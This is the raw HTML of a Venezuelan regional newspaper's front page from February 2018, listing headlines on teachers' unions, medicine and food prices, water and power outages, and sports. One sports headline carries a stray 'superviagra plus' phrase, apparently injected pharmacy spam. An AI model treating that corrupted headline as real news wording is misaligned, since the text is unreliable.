                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                            </ul>
                        </div>
                        
                                                
                    </section><!--News box 3-->
                    
            
	                    
            	    
		<section class="section news-box nb1 cat_11"><!--News box 1-->
			                                    
                            <header class="block-title">
                                <h2><a href="http://diarioavance.com/?cat=11">Educación</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb1" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="11">Todas</a></li>
				                            </ol>
                            </header>
                            
                            <ul>
                                                                <li class="post-165389 post type-post status-publish format-standard has-post-thumbnail category-de-tu-interes category-educacion tag-ejecutivo-regional tag-sindicatos-educativos-se-reunieron-con-el pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165389">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/aula-de-clase--364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/aula-de-clase--765x510.jpg" alt="Sindicatos educativos se reunieron  con el Ejecutivo Regional">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165389">Sindicatos educativos se reunieron  con el Ejecutivo Regional</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        &nbsp; * Se planteó la necesidad de mejorar el HCM Ramón Francia, presidente de la Federación Venezolana de Maestro...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                                <li class="post-164998 post type-post status-publish format-standard has-post-thumbnail category-educacion category-temas-del-dia tag-mejoras tag-nacional-2 pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=164998">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Alexi-Molina-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Alexi-Molina-765x510.jpg" alt="UE El Nacional clama por mejoras">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=164998">UE El Nacional clama por mejoras</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        El supervisor circuital de la Zona Educativa, Alexis Molina, informó que son varias las necesidades que se tienen e...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                            </ul>
                                                    
                    </section><!--News box 1-->
		
	    
	                    
            	    
		<section class="section news-box nb1 cat_10"><!--News box 1-->
			                                    
                            <header class="block-title">
                                <h2><a href="http://diarioavance.com/?cat=10">Salud</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb1" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="10">Todas</a></li>
				                            </ol>
                            </header>
                            
                            <ul>
                                                                <li class="post-165281 post type-post status-publish format-standard has-post-thumbnail category-salud tag-medicamentos tag-yeso pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165281">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Yeso-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Yeso-765x510.jpg" alt="Colocarse un yeso  supera los Bs. 500 mil">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165281">Colocarse un yeso  supera los Bs. 500 mil</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        Debido a la situación económica del país colocarse un yeso puede resultar algo engorroso, los insumos necesarios no...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                                <li class="post-165212 post type-post status-publish format-standard has-post-thumbnail category-salud tag-anticonceptivas tag-pildoras tag-precios pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165212">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Anticonceptivas-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Anticonceptivas-765x510.jpg" alt="Precios de las píldoras anticonceptivas dejan fría a más de una">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165212">Precios de las píldoras anticonceptivas dejan fría a más de una</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        &nbsp;  Si anteriormente las mujeres se encomendaban a Dios para no salir embarazadas, ahora tendrán que rezar el r...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                            </ul>
                                                    
                    </section><!--News box 1-->
		
	    
	                    
            	    
		<section class="section news-box nb1 cat_13"><!--News box 1-->
			                                    
                            <header class="block-title">
                                <h2><a href="http://diarioavance.com/?cat=13">Comunidad</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb1" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="13">Todas</a></li>
				                            </ol>
                            </header>
                            
                            <ul>
                                                                <li class="post-165459 post type-post status-publish format-standard has-post-thumbnail category-comunidad tag-comunidad tag-sin-luz pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165459">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/luz-en-las-cadenas-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/luz-en-las-cadenas-765x510.jpg" alt="Calle Las Cadenas sumergida en la oscuridad">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165459">Calle Las Cadenas sumergida en la oscuridad</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        Lugareños de la comunidad tequeña Las Cadenas, se mantienen en una situación con el alumbrado público que trae grav...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                                <li class="post-165310 post type-post status-publish format-standard has-post-thumbnail category-comunidad tag-agua tag-fallas tag-hidrocapital pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165310">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-copia-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-copia-765x510.jpg" alt="Hidrocapital tiene a La Cruz con la garganta seca">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165310">Hidrocapital tiene a La Cruz con la garganta seca</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        Como auténticos camellos, viven los habitantes de varios sectores en la comunidad de La Cruz, en Brisas de Oriente....	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                            </ul>
                                                    
                    </section><!--News box 1-->
		
	    
	                    
            	    
		<section class="section news-box nb1 cat_14"><!--News box 1-->
			                                    
                            <header class="block-title">
                                <h2><a href="http://diarioavance.com/?cat=14">Consumo</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb1" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="14">Todas</a></li>
				                            </ol>
                            </header>
                            
                            <ul>
                                                                <li class="post-165426 post type-post status-publish format-standard has-post-thumbnail category-consumo category-titulares tag-pollo pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165426">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/precio-de-pollos--364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/precio-de-pollos--765x510.jpg" alt="El pollo aumentó 9.815% en un  año">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165426">El pollo aumentó 9.815% en un  año</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        El pollo pasó de ser la proteína principal en el plato de los venezolanos, a no ser consumido por el alto costo. De...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                                <li class="post-165288 post type-post status-publish format-standard has-post-thumbnail category-consumo category-titulares tag-clap tag-protestan pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165288">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Protesta-San-Pedro-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Protesta-San-Pedro-765x510.jpg" alt="Protestan por falta de CLAP">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165288">Protestan por falta de CLAP</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        La vía principal de San Pedro se vio abarrotada de personas que exigían la presencia de la alcaldesa de Guaicaipuro...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                            </ul>
                                                    
                    </section><!--News box 1-->
		
	    
	
		</div> 
	</div> 
</div><div class="vc_row wpb_row vc_row-fluid">
	<div class="vc_col-sm-12 wpb_column vc_column_container">
		<div class="wpb_wrapper">
					<div class="mom-ads-wrap">
	<div class="mom-ads " style="">
		<div class="mom-ads-inner">
		
				<div class="mom-ad" data-id="52241" style="width:728px; height:90px; ">
					<a href="#" target=""><img src="http://diarioavance.com/wp-content/uploads/2015/01/Automercado-Express-animado1.gif" alt="Deporte"></a>
		 	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>

		</div> 
	</div> 
</div><div class="vc_row wpb_row vc_row-fluid">
	<div class="vc_col-sm-12 wpb_column vc_column_container">
		<div class="wpb_wrapper">
			        <script>
            jQuery(document).ready(function($) {
             //Scroller
	                  //Scroller2
            $(".sw2-81").owlCarousel({
              autoplay:true,
			  autoplayTimeout:3000,
              slideSpeed : 300,
                            items : 4,
              lazyLoad : true,
              itemsScaleUp: true,
              loop: true,
              navigation : true,
              autoWidth:          true,
              autoHeight:         true,
              nav:true,
              responsiveClass:true,
              responsive:{
	              1024:{
	                  items:4,
                  },
                  970:{
		            	items:4  
	              },	
              	  795:{
		            	items:2  
	              },
				  678:{
		            	items:2  
	              },
	              567:{
		            	items:2  
	              },
	              450:{
		            	items:1  
	              },
	              360:{
		            	items:1  
	              },
	              320:{
		            	items:1  
	              },
              }
            });
	                
          });
        </script>
                
                                            	
                    <section class="section scroller-section">
                        <header class="section-header">
                                                        <h2 class="section-title">Deportes Regionales</h2>
                                                                                </header>
                        
                        <div class="scroller2">
                            <ul class="scroller2-wrap sw2-81">
                                                               <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=163785">
                                                                                <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/La-patota-blanqui-amarilla-se-coclocó-a-un-paso-de-la-aureola-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/La-patota-blanqui-amarilla-se-coclocó-a-un-paso-de-la-aureola-765x510.jpg" alt="Los Huesos marcaron primero en la final superviagra plus"></figure>
                                                                                <h2 itemprop="name">Los Huesos marcaron primero en la final superviagra plus</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=17">Deportes</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=163783">
                                                                                <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/Los-eléctricos-con-su-3a-corona-en-el-softbol-libre02-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/Los-eléctricos-con-su-3a-corona-en-el-softbol-libre02-765x510.jpg" alt="Arturo Cable derrotó a Ferreteros y se tituló campeón C-2"></figure>
                                                                                <h2 itemprop="name">Arturo Cable derrotó a Ferreteros y se tituló campeón C-2</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=17">Deportes</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=163235">
                                                                                <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/DN9svtBW0AAs-Rl-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/DN9svtBW0AAs-Rl-765x510.jpg" alt="La Sub 18 de Estudiantes no pudo ante Aragua FC"></figure>
                                                                                <h2 itemprop="name">La Sub 18 de Estudiantes no pudo ante Aragua FC</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=25">Regional</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=162733">
                                                                                <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/unnamed-1-copia-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/unnamed-1-copia-765x510.jpg" alt="Karateca carrizaleña deja el nombre de Venezuela en alto"></figure>
                                                                                <h2 itemprop="name">Karateca carrizaleña deja el nombre de Venezuela en alto</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=25">Regional</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=162620">
                                                                                <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/10/Las-vencedoras-fueron-felicitadas-y-aplaudidas-por-el-público-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/10/Las-vencedoras-fueron-felicitadas-y-aplaudidas-por-el-público-765x510.jpg" alt="Las Amigables campeonas de  bolas criollas empresarial 2017"></figure>
                                                                                <h2 itemprop="name">Las Amigables campeonas de  bolas criollas empresarial 2017</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=17">Deportes</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=162137">
                                                                                <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/10/unnamed-1-11-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/10/unnamed-1-11-765x510.jpg" alt="Por tercer año consecutivo se realiza la Caimanera Coca Cola en Carrizal"></figure>
                                                                                <h2 itemprop="name">Por tercer año consecutivo se realiza la Caimanera Coca Cola en Carrizal</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=25">Regional</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                            </ul>
                        </div>
                    </section>
          
                	
		</div> 
	</div> 
</div><div class="vc_row wpb_row vc_row-fluid">
	<div class="vc_col-sm-12 wpb_column vc_column_container">
		<div class="wpb_wrapper">
			<section class="section nip-box cat_24"><!--news pics-->
    <header class="block-title">
        <h2>Nacional</h2>
    </header>
    
    <div class="nip clearfix">
                                    <div class="first-item" itemscope="" itemtype="http://schema.org/Article">
                <figure class="post-thumbnail"><a class="simptip-position-top simptip-movable half-arrow simptip-multiline" itemprop="url" href="http://diarioavance.com/?p=165188" data-tooltip="Venezuela se las verá con Uruguay en semifinales de la Copa Davis">
                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/copa-d.jpg_1609701233-359x240.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/copa-d.jpg_1609701233.jpg" alt="Venezuela se las verá con Uruguay en semifinales de la Copa Davis">
                </a></figure>
            </div>
                                    <ul>
                                                            <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Puerto Rico vapuleó a Venezuela para alcanzar la clasificación" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165092">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/151787517395991176-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/151787517395991176.jpg" alt="Puerto Rico vapuleó a Venezuela para alcanzar la clasificación">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Molina y Valdez cara a cara en el tercero de la Serie del Caribe" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164978">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Nestor-Molina-02-gde-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Nestor-Molina-02-gde-765x510.jpg" alt="Molina y Valdez cara a cara en el tercero de la Serie del Caribe">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Venezuela bombardeó a República Dominicana" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164935">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/15177004391042186148-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/15177004391042186148.jpg" alt="Venezuela bombardeó a República Dominicana">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Omar López: &#8220;Hay que aprovechar toda oportunidad&#8221;" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164851">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/1517509535490029957-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/1517509535490029957.jpg" alt="Omar López: &#8220;Hay que aprovechar toda oportunidad&#8221;">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="La tribu usará la camisa de Venezuela en la Serie del Caribe" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164792">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/aguilas-gde-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/aguilas-gde-765x510.jpg" alt="La tribu usará la camisa de Venezuela en la Serie del Caribe">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Barquisimeto espera por los dólares para organizar la Serie del Caribe 2019" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164761">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/AntonioHerreraGutierrez1-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/AntonioHerreraGutierrez1-765x480.jpg" alt="Barquisimeto espera por los dólares para organizar la Serie del Caribe 2019">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Gregor Blanco retornará con los Gigantes" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164675">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/15173480371538856165-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/15173480371538856165.jpg" alt="Gregor Blanco retornará con los Gigantes">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Altuve: No puedo creer que me eligieron como JMV, es un sueño hecho realidad" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164650">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/altuve_beisbol.jpg_84742877-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/altuve_beisbol.jpg_84742877.jpg" alt="Altuve: No puedo creer que me eligieron como JMV, es un sueño hecho realidad">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Boxeo venezolano conquistó 10 medallas en Juegos Bolivarianos 2017" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164381">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/DO9Foy7XkAASATl-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/DO9Foy7XkAASATl-765x510.jpg" alt="Boxeo venezolano conquistó 10 medallas en Juegos Bolivarianos 2017">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Venezuela obtuvo 30 medallas este viernes en los Bolivarianos de Santa Marta" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164333">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2017/11/DO7YmpTW4AADhyC-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2017/11/DO7YmpTW4AADhyC-765x510.jpg" alt="Venezuela obtuvo 30 medallas este viernes en los Bolivarianos de Santa Marta">
                    </a></figure>
                    </li>
                                                    </ul>
        </div>
    
</section><!--news pics-->
<section class="section nip-box cat_23"><!--news pics-->
    <header class="block-title">
        <h2>Internacional</h2>
    </header>
    
    <div class="nip clearfix">
                                    <div class="first-item" itemscope="" itemtype="http://schema.org/Article">
                <figure class="post-thumbnail"><a class="simptip-position-top simptip-movable half-arrow simptip-multiline" itemprop="url" href="http://diarioavance.com/?p=165416" data-tooltip="El médico de la selección brasileña evaluará a Neymar en París">
                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/15197536761565449371-359x240.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/15197536761565449371.jpg" alt="El médico de la selección brasileña evaluará a Neymar en París">
                </a></figure>
            </div>
                                    <ul>
                                                            <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="El Madrid se estancó con el Espanyol" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165412">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/15197659081230693528-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/15197659081230693528.jpg" alt="El Madrid se estancó con el Espanyol">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Juegos de Invierno: Alemania sigue comandando el medallero de Pyeongchang-2018" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165277">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/alema.jpg_1609701233-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/alema.jpg_1609701233.jpg" alt="Juegos de Invierno: Alemania sigue comandando el medallero de Pyeongchang-2018">
                    </a></figure>
                    </li>
                                                                                                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Triplete de Higuaín en goleada de la Juve" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164975">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/1517763084456432186-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/1517763084456432186.jpg" alt="Triplete de Higuaín en goleada de la Juve">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="El boxeo podría ser excluido de Juegos Olímpicos de Tokio-2020" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164962">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/box2.jpg_1609701233-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/box2.jpg_1609701233.jpg" alt="El boxeo podría ser excluido de Juegos Olímpicos de Tokio-2020">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="El Madrid sigue en caída libre" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164920">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/1517694679298170076-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/1517694679298170076.jpg" alt="El Madrid sigue en caída libre">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Blatter demandaría a la FIFA para limpiar su nombre" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164854">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/1517494889249138683-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/1517494889249138683.jpg" alt="Blatter demandaría a la FIFA para limpiar su nombre">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="El Porto le da la bienvenida a Yordan Osorio" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164785">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/1517433736142010129-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/1517433736142010129.jpg" alt="El Porto le da la bienvenida a Yordan Osorio">
                    </a></figure>
                    </li>
                                                                                <li class="simptip-position-top simptip-movable half-arrow simptip-multiline" data-tooltip="Los Knicks vapulean a Nets para barrer la serie de Nueva York" itemscope="" itemtype="http://schema.org/Article">
                    <figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=164743">
                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/kristaps-porzingis.jpg_1609701233-85x57.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/kristaps-porzingis.jpg_1609701233.jpg" alt="Los Knicks vapulean a Nets para barrer la serie de Nueva York">
                    </a></figure>
                    </li>
                                                    </ul>
        </div>
    
</section><!--news pics-->

		</div> 
	</div> 
</div>
<!-- WhatsApp Share Button for WordPress: http://peadig.com/wordpress-plugins/whatsapp-share-button/ --><div class="wabtn_container"><a href="whatsapp://send?text=Principal - http://diarioavance.com/" class="wabtn">Share this on WhatsApp</a></div>                    	</div>
                    	 <aside class="secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar"><!--secondary sidebar-->
	<div class="widget posts"><div class="widget-title"><h2 style="background:#1e73be;border-color:#1e73be;color:#ffffff;">Portada de hoy</h2></div>
		<ul class="post-list">
																					
			<li itemscope="" itemtype="http://schema.org/Article">
								<figure class="post-thumbnail"><a itemprop="url" href="http://diarioavance.com/?p=165464" rel="bookmark">
				<img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/01-AVANCE-28-02-2018-170x113.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/01-AVANCE-28-02-2018-367x237.jpg" alt="Portada miércoles 28 de febrero de 2018">
				</a></figure>
								<h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165464" rel="bookmark">Portada miércoles 28 de febrero de 2018</a></h2>
								<div class="entry-meta">
									    				</div>
								<a href="http://diarioavance.com/?p=165464" class="read-more-link">Leer más...</a>
			</li>

											</ul>
